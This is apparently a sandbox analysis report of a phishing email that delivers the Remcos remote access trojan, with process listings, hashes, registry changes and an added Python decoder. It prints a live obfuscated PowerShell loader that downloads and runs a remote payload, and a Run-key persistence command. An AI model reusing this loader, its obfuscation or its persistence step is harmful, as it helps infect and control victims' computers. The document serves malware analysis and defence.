File name: 92093672-f98f-3255-101c-e031e624c481.eml

Full analysis: https://app.any.run/tasks/520d7d6f-aa61-48b3-87f7-b187c50ed809
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete or partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common RAT features include access to the user's data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: May 27, 2025, 06:08:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
attachments
attc-unc
susp-attachments
dkim-fail
rat
remcos
remote
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5: 326FCE10991A02776F4569DD933D0875
SHA1: 28DA7BE1360A324C097B0A5B5CE434F7DE200C61
SHA256: 2E8D22ED33FD2C47A93FC9B2D225E7525BEF9E30B2BAD94E32111C661DD568AB
SSDEEP: 384:8DD350B7qDiH1XBfC73sMD2yX55NxPO0oUWt8l+wy+O5SIpWC+8Kk25cSv:3/q732sDbMCl+wy75tpWCFb25cSv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for user acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 4000)
      • powershell.exe (PID: 856)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7800)
    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7800)
    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 7264)
  • SUSPICIOUS

    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 856)
      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 4000)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 7844)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7740)
      • cmd.exe (PID: 7260)
      • cmd.exe (PID: 7012)
      • powershell.exe (PID: 8008)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7800)
    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7800)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7996)
    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 7264)
    • Connects to unusual port

      • msiexec.exe (PID: 7264)
    • Contacting a server suspected of hosting a CnC

      • msiexec.exe (PID: 7264)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1328)
    • Application launched itself

      • powershell.exe (PID: 8008)
  • INFO

    • Manual execution by a user

      • WinRAR.exe (PID: 7540)
      • cmd.exe (PID: 7740)
      • notepad.exe (PID: 7936)
      • powershell.exe (PID: 7996)
      • cmd.exe (PID: 7260)
      • powershell.exe (PID: 1512)
      • cmd.exe (PID: 7012)
      • powershell.exe (PID: 8008)
      • powershell.exe (PID: 7844)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Disables trace logs

      • powershell.exe (PID: 7800)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Checks proxy server information

      • powershell.exe (PID: 7800)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 7936)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 8004)
      • conhost.exe (PID: 7360)
      • conhost.exe (PID: 5544)
      • conhost.exe (PID: 2268)
      • conhost.exe (PID: 7692)
      • conhost.exe (PID: 7968)
      • conhost.exe (PID: 7608)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 7996)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7996)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 7264)
    • The sample was compiled with English language support

      • msiexec.exe (PID: 7264)
    • Reads the software policy settings

      • slui.exe (PID: 5392)
Find more information about signature artifacts and mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
All screenshots are available in the full report
Total processes: 171
Monitored processes: 36
Malicious processes: 4
Suspicious processes: 0

Behavior graph

start outlook.exe ai.exe no specs sppextcomobj.exe no specs slui.exe winrar.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe notepad.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs #REMCOS msiexec.exe slui.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs svchost.exe powershell.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs msiexec.exe msiexec.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID:
856
CMD:
powershell.exe -windowstyle hidden "Get-ChildItem;Get-Service;$Baadlngderne=(gcm A:).CommandType;$Baadlngderne=[String]$Baadlngderne;$Skobrster='Cordialises';$Baadlngderne+=':';(n`i -p $Baadlngderne -n paik -value { param ($Atocia39);$Skobrster='Arbejdsopgaver';$Hjemmesiden=4;$Smurks='Sarin';do {$Shingling+=$Atocia39[$Hjemmesiden];$Hjemmesiden+=5} until(!$Atocia39[$Hjemmesiden])$Shingling});(n`i -p $Baadlngderne -n Lempninger -value {param ($Nephralgic);.($Demonographies123) ($Nephralgic)}); [remainder of the obfuscated script omitted]"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1116
CMD:
C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\drpbaqnzqqcaxtbo"
Path:
C:\Windows\SysWOW64\svchost.exe
Parent process:
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\thda70.tmp
c:\windows\syswow64\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
PID:
1328
CMD:
"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Cupolated" /t REG_EXPAND_SZ /d "%pikhammer% -windowstyle 2 $Nonsyntactically=(g`p 'HKCU:\Software\Standardprodukter\').'Skarnskngtene';%pikhammer% ($Nonsyntactically)"
Path:
C:\Windows\SysWOW64\cmd.exe
Parent process:
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID:
1512
CMD:
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;$Baadlngderne=(gcm A:).CommandType;$Baadlngderne=[String]$Baadlngderne;$Skobrster='Cordialises';$Baadlngderne+=':';(n`i -p $Baadlngderne -n paik -value { param ($Atocia39);$Skobrster='Arbejdsopgaver';$Hjemmesiden=4;$Smurks='Sarin';do {$Shingling+=$Atocia39[$Hjemmesiden];$Hjemmesiden+=5} until(!$Atocia39[$Hjemmesiden])$Shingling});(n`i -p $Baadlngderne -n Lempninger -value {param ($Nephralgic);.($Demonographies123) ($Nephralgic)}); [remainder of the obfuscated script omitted]"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID:
1568
CMD:
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Cupolated" /t REG_EXPAND_SZ /d "%pikhammer% -windowstyle 2 $Nonsyntactically=(g`p 'HKCU:\Software\Standardprodukter\').'Skarnskngtene';%pikhammer% ($Nonsyntactically)"
Path:
C:\Windows\SysWOW64\reg.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
PID:
2196
CMD:
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path:
C:\Windows\System32\svchost.exe
Parent process:
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID:
2236
CMD:
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;=(gcm A:).CommandType;=[String];='Cordialises';+=':';(ni -p -n paik -value { param ();='Arbejdsopgaver';=4;='Sarin';do {+=[];+=5} until(![])});(ni -p -n Lempninger -value {param ();.() ()}); [remainder of the obfuscated script omitted; variable references are empty throughout this command line]"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID:
2268
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
3156
CMD:
"C:\WINDOWS\SysWOW64\msiexec.exe"
Path:
C:\Windows\SysWOW64\msiexec.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
2
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
4000powershell.exe -windowstyle hidden "Get-ChildItem;Get-Service;$Baadlngderne=(gcm A:).CommandType;$Baadlngderne=[String]$Baadlngderne;$Skobrster='Cordialises';$Baadlngderne+=':';(n`i -p $Baadlngderne -n paik -value { param ($Atocia39);$Skobrster='Arbejdsopgaver';$Hjemmesiden=4;$Smurks='Sarin';do {$Shingling+=$Atocia39[$Hjemmesiden];$Hjemmesiden+=5} until(!$Atocia39[$Hjemmesiden])$Shingling});(n`i -p $Baadlngderne -n Lempninger -value {param ($Nephralgic);.($Demonographies123) ($Nephralgic)});ConvertTo-Html;$Skossen=paik ' KbsN Ho EGrdhTVred.BuniW';$Skossen+=paik 'A teeT,rfBContcTy nL Wavi GraEAlenND ant';$Gradationately=paik '.rteMSpisobevezD.taiM,dilBajolBlaaaSha /';$Poligarship=paik 'RekrTAzoxlPrecs itt1Sjus2';$Smugleri='Spli[BeloNAppeE.kovTM,da.TikiSPr.vEArraRSokkV dleiDrabcAt.rETuvapHandoCannINex nDex T Sarm MycAP ogNGrntAGu,zg SecESkygRInco]Inda:Rott:rallS ,rueBorgCMi.aUOsphR.rodi nttSatuYTalePLum R SkroSja.t PreOU dic Ko OstrilOver= Rea$WeazPPm soAntelJenkiF,nggFarta D mrTrans,smeh BerIUdtaP';$Gradationately+=paik ' Bro5 lek.Ri c0Ind nd(,equW GoliSmo.nEksedTallorosiwSuprsFors EupN Fo TBoks Vrdi1.jrs0Mini.qu.a0Evne;Infr Ac.uWF ldiSymbnCu s6Samm4 Mar;Canr U.skxfuld6 M f4 Tvr;Nytt GstrSoldvUnca:Unlo1O.er3Alca7 Ana.K,ig0Tred),lin KresGWoote .idc BeskByggoP ut/For 2Stig0Bund1Sd k0R gs0 len1Bran0O,er1Teks BrnF AnkiCassr PseeAktif MiloU dexBags/ esu1 ust3 Pt 7Mari.Ocea0';$Wingbeats=paik 'Gr gUAltasAngieSp nrbarb-Konsa derGCyn.EI senF ret';$Multistorey=paik ' FryhDethtRegntPolypEkspsNitt:Slu,/F re/ Je bDis aFo.rn C lgJackl Z raMi hd BameOr.dsLil hAutoc haneT.ygnArkatBengr co.aRecelTroppudfrrAnt eUgels,ilis avcRougl.egauMonebSpnd. 
Pascdat.oBeklmPfun/diagPGabiiTastnBrn.d KseeKontrFakuiVen 1 Ove7fo t0Down.dierc Coah Belm';$Resealed=paik 'Hype>';$Demonographies123=paik ' .upIQu nETyvtX';$Prisniveauernes='Noddles';$Shmoozes='\Fricative.Han';Lempninger (paik 'Stap$BrangSteglDr pORegebAfgaA EvoL Agt:RefoBMe ir.ipsiSociXdismvhaploThalL,elsDFarv= Tor$ TruEBegnnMoraVRu a: npraImpoPDo,uP SrgdForbaCisttHys.As rt+Brnd$BehaSPresHAntiMUnlioBipaO ,utZNonaeOrtos');Lempninger (paik 'Edda$DigegS meLDichoPantbSiljaNajaL S m:Ca,ghHalvo romLandOVrool,ichOEso GOverIGut SAnsti Rovn norgAfsk=Wohl$Ad,pmN.elUSodol Itst SkoIOps s onnTOmnooDeprr tarEInteYAsse.Ro.lsRaa,P.tatL rinIVej.tsor.( B g$FatoRKendE Zi,S sw eI.niaNayaLBlabeSocidGand)');Lempninger (paik $Smugleri);$Multistorey=$Homologising[0];$Schizogregarine=(paik ' War$Y.lpGSpril orsOTot.bdoriaDo dlObol:Bus SFou tlegeaFuzzt E nIMorfOAffanHalfsfarvFProaoeg ir VejsSnitTNovia ArbNFrilD.laneC loRDefiSMega=godkN TelEUdplW Gut-GeheOKonobEl vJ F,reMa,cC Fo tDelg .anSPestyV deSLngdTsekuEMairMfrij. Lot$BituspeopKUnwaoO,tcSMitiS GeneB kpn');Lempninger ($Schizogregarine);Lempninger (paik 'None$Kol SSu et rosaSalttOp,qiPrenoUrfjn ch sCitef.foro KulrSndesperstBlodaSchenunildUndeeBagarEpausUnde.Sl eHSukkefluea ulndFilieRen,rShrisData[Paci$Int.WMagni Equn antgfrivbOvereMagnaGenttEsrosPara] ilb=Haus$.imuG Fo,rExcia I edGlauaBystt AfriBeleoUnwrnAffaa enetUndie RoslBrney');$Hvirvelstroemmen=paik 'T,skDEskaoSmaawCra.n embl Trao aria CridTokaFLvefiBrnelSupie';$formularise=paik 'pmsg$ ydrSP litPolya atatB,rbiVi uoSaunn Fjosno af Derod rmr TecsH rvtH eraMetan Sy ddal eSus,rlstes Pol.S gn$U coHBranvFir iNedsrTankv crue heclSminsBrdntEje rSommoSamfeMuslmE ghmIdeneBoolnUnin. 
LizIPri nBanavDupnoUnh kCardeSt n( Ger$L.tvM famu lkl,akst I diThrosT.yktdinnoTanqrFluee,renyNonf,Deno$ B vP Elliau,ynF orkdivieInderUnbusNeks)';$Pinkers=$Brixvold;Lempninger (paik 'Bal.$Vangg I cLAfsnO tribVaneA.onilNysk: InwA U,ar rreiLu asSkrikCheaeUngr=Voks(H.mlTTilseProvs stetindi-FlegpM.liA B,oTBeskHB,fr Boh $a tipTr tI WatNNonbKH ndeBijarCherSApp )');while (!$Ariske) {Lempninger (paik 'Tamb$Ditig.egnl,ippoUnbabSluka eaclUds :Na uR ommrHonoiSubag gtesA git eli=S,ke$gev DFornlSls e vins') ;Lempninger $formularise;Lempninger (paik ' Pyg[PoleTSupehmeilRHo.hE .nmaAudiDWeltIC luntr mgPunn.SvigTSddoHNonirkaree UnwaRaaddMedd] Bog:.ale:Ha mSLinolTotae vise StapJus.(Z.nc4 Hal0 Dow0no t0Tilb)');Lempninger (paik 'D,te$ B sgM taLkun oAdreB egoAGrail Una:CoppaEc iRSulpiUngdS A.tkJagtE nkl=Agor(SgnitUnstEEbelS ccotMeno-RdnbpSurraPicot InsHoryx Asti$A tip uppIWi sn AfvkSalaEMillR aveS Sa.)') ;Lempninger (paik '.iki$Anakg ympLKviko eribRe fa Pa LParl:ElecS JackDislUtrkbmpaomLZa,ceImplSCuar=Brom$ Ti GFruglTechOGrinB t iaBegyLSnks:bartfRettLCampUMisdeGeheF Hori aboS ManK M ne mgr Di EBranSudso+Se l+Mi,j%Milj$EvalHSishOHe,sM pero Ba LC rroUkuegKo biS.usSCemeiRus NF rpGDe e.Eme cFinno OveuAksiNImmot') ;$Multistorey=$Homologising[$Skumles]}$Trike225=382880;$Parataktiske=28663;Lempninger (paik ' Acr$As rGspleLStvfOjo dBGruna .omlDelt:FacevD pnEMaltXRevoApothTFodbILazuOPostNSy.fsHelt Feel= nva Tiltg ukkeProsT,nsu-.dskcFrosoKlisNUndeT,hysE GraN ishtDrum bal$FortP PteiSkrin KomkR,vee Bu rWests');Lempninger (paik 'Sokk$ SalgBesmlToucoRnnebTatoaIntelMund:PagaR roa ca tDkn hTreso St,lInveeSublsDokt Triu= Tee Konv[ BoyS,unfyBrucsjagttPr ieIllumNons.Umr CTilfoDatanFrysv D deDi krCountOver]B,st:Laye:OogoFButtrsprgoVoldmSu.eBUn.xaS agsm due lde6Told4MetaSTobat tacrDiskiDespnInsigCulo( Pur$ weVBra esubtxInfaaRasetBackiPerioHal.nKno sRund)');Lempninger (paik '.lut$frs GRitulTo loP imb eubaKnopl neu:LangF Marj Ka,eMartr P ld UdsIFaldNC mmGpiz SSo s Bea =d ft ,ade[MykosObedyAnlbSGoest.terE 
pimFa.s.EnuctTimeEGu.lXHvidT Im .Bo tETeknns jecT piOopfrD ystIBrndnWittgAncy]Skov:Livs:Sla a P rs IncCTe riRekliAfka. OblGM nnEBrugt NorS,lutTBillrSamfiSt nNStjrG ,ak(Blep$LutiRRetsa K,mt.preH scaOB onlC naESty sDarr)');Lempninger (paik 'Kies$SejlGLloylEfovO.radb.elmaStukL Tak:brnea U msPrisPSieveTragrPipeGOrgaiSysilS ralSvrmi ndefDo ioTilmr opsMPack=c mp$Ska fClotJCauseUdlur be,dSclei SednNonsGSkatsP pe.VkstSLi rURektbTyroSres t ljeRDekaII dvnOv rGKnko( Ove$ Humt Antrl,teIRapnk idde Sle2.rfo2 F.n5 Poz,S.ks$Dis PNon acronR AppaC rcTSupeAHypok Gevt De i AccSma.nkmaadeU rm)');Lempninger $Aspergilliform;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
Total events: 51 463
Read events: 50 231
Write events: 1 084
Delete events: 148
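
The powershell.exe (PID 4000) command line above builds every sensitive string at run time through a function it names `paik`. The command line obtains the string "Function:" from `(gcm A:).CommandType` plus `':'` and uses New-Item (`n`i`) on that drive to define `paik` as a loop that starts at index 4 and keeps every fifth character of its argument; the rest is filler. `Lempninger` passes its argument to `.($Demonographies123)`, so whatever `$Demonographies123` decodes to is the real invocation verb. The helper below is an added analysis aid, not code from the sample, from ANY.RUN or from the full report; it re-implements that loop in Python, runs it over assignments copied verbatim from the command line above, and flags payloads whose length is not a whole number of 5-character groups, since the report rendering appears to collapse runs of spaces and those strings (the User-Agent tail, the download URL) no longer decode reliably from this page. The assignment fragment, `looks_intact` and `decode_assignments` are this example's own constructions; the `$Shmoozes='\Fricative.Han'` assignment in the command line is not obfuscated and matches the file PID 7800 writes under AppData\Roaming in the Dropped files list.

```python
"""Decoder for the `paik` string obfuscation in the PID 4000 PowerShell loader.

Added analysis helper, not code from the sample or the sandbox report.
"""
import re


def paik(s: str, start: int = 4, step: int = 5) -> str:
    """Python equivalent of the loader's do/until loop:
    $i=4; do { $out += $s[$i]; $i += 5 } until(!$s[$i])
    PowerShell yields $null when indexing past the end, which ends the loop,
    so this is exactly a stride-5 slice starting at index 4."""
    return s[start::step]


def looks_intact(raw: str, step: int = 5) -> bool:
    """Heuristic (this example's own): an untouched payload is a whole number of
    5-char groups.  The page rendering seems to collapse runs of spaces, which
    breaks that property, so a failing string's decode must not be trusted."""
    return len(raw) % step == 0


# One paik assignment as it appears in the command line: $Var=paik '...' / $Var+=paik '...'
PAIK_ASSIGN = re.compile(r"(\$\w+)(\+?=)paik '([^']*)'")


def decode_assignments(fragment: str):
    """Rebuild each variable the loader assembles with paik, honouring '+=' appends
    (e.g. $Skossen is built from two pieces).  Returns ({var: value}, {var: intact})."""
    values, intact = {}, {}
    for var, op, raw in PAIK_ASSIGN.findall(fragment):
        piece = paik(raw)
        values[var] = (values.get(var, "") + piece) if op == "+=" else piece
        intact[var] = intact.get(var, True) and looks_intact(raw)
    return values, intact


# Assignments copied verbatim from the command line above.  All but one decode
# cleanly; the second $Gradationately piece is included (truncated) to show what a
# payload with collapsed whitespace looks like to the intact check.
FRAGMENT = (
    r"$Skossen=paik ' KbsN Ho EGrdhTVred.BuniW';"
    r"$Skossen+=paik 'A teeT,rfBContcTy nL Wavi GraEAlenND ant';"
    r"$Gradationately=paik '.rteMSpisobevezD.taiM,dilBajolBlaaaSha /';"
    r"$Poligarship=paik 'RekrTAzoxlPrecs itt1Sjus2';"
    r"$Gradationately+=paik ' Bro5 lek.Ri c0Ind nd(,equW';"  # truncated, spaces collapsed on the page
    r"$Wingbeats=paik 'Gr gUAltasAngieSp nrbarb-Konsa derGCyn.EI senF ret';"
    r"$Resealed=paik 'Hype>';"
    r"$Demonographies123=paik ' .upIQu nETyvtX';"
    r"$Hvirvelstroemmen=paik 'T,skDEskaoSmaawCra.n embl Trao aria CridTokaFLvefiBrnelSupie';"
)


def report(fragment: str = FRAGMENT):
    """Decode the fragment and render one line per variable.  $Demonographies123 is
    what Lempninger invokes via .($Demonographies123), so its value (IEX) tells you
    every Lempninger(...) call is Invoke-Expression on a paik-decoded string."""
    values, intact = decode_assignments(fragment)
    lines = []
    for var, val in values.items():
        flag = "" if intact[var] else "  [payload length not a multiple of 5: unreliable]"
        lines.append(f"{var} = {val!r}{flag}")
    return values, intact, "\n".join(lines)


if __name__ == "__main__":
    print(report()[2])
```

Run as a script it prints the resolved variables: `$Skossen` is `NET.WeBcLiENt`, `$Hvirvelstroemmen` is `DownloadFile`, `$Wingbeats` is `User-aGEnt`, `$Poligarship` is `Tls12`, `$Demonographies123` is `IEX`, while `$Gradationately` is flagged unreliable. Strings flagged that way should be decoded from the raw command line or the process dump in the full report rather than from this rendering.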

Modification events

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsData
Operation: write
Name: SessionId
Value: 56265D7A-5ED6-425A-A9D7-63C554BB0212

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics
Operation: delete value
Name: BootFailureCount
Value:

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Preferences
Operation: delete value
Name: ChangeProfileOnRestart
Value:

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046
Operation: write
Name: 00030429
Value: 09000000

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsData
Operation: write
Name: ProfileBeingOpened
Value: Outlook

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046
Operation: write
Name: 00030397
Value: 60000000

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\outlook
Operation: write
Name: BuildNumber
Value: 16.0.16026

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
Operation: write
Name: CountryCode
Value: std::wstring|GB

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook
Operation: write
Name: Expires
Value: int64_t|0

(PID) Process: (6640) OUTLOOK.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook
Operation: delete value
Name: ConfigIds
Value:
Executable files: 3
Suspicious files: 17
Text files: 25
Unknown types: 0

Dropped files

PID | Process | Filename | Type (- = empty on the page)

6640 | OUTLOOK.EXE | C:\Users\admin\Documents\Outlook Files\Outlook1.pst | -
MD5:
SHA256:

6640 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres | binary
MD5: 94712AC9E633FB87CCD660068323AF29
SHA256: 4036287EFC86774E7312F092DF9CDF0B25DEE0D39B4364A67FDBF5351F7B50FF

6640 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TableViewPreviewPrefs_2_D8B13DC3A8DF9045BC2148D57D50BDC5.dat | xml
MD5: 0E092DB99AEE99FDFF9B5B222C732CFD
SHA256: D1614AD99ADED9F6F5C1BE7FE7FFA5124BD04A526580DA3818EA8A954E852AA6

7800 | powershell.exe | C:\Users\admin\AppData\Roaming\Fricative.Han | text
MD5: 31A9AA907626CA9107A2B3E2F8EF31F8
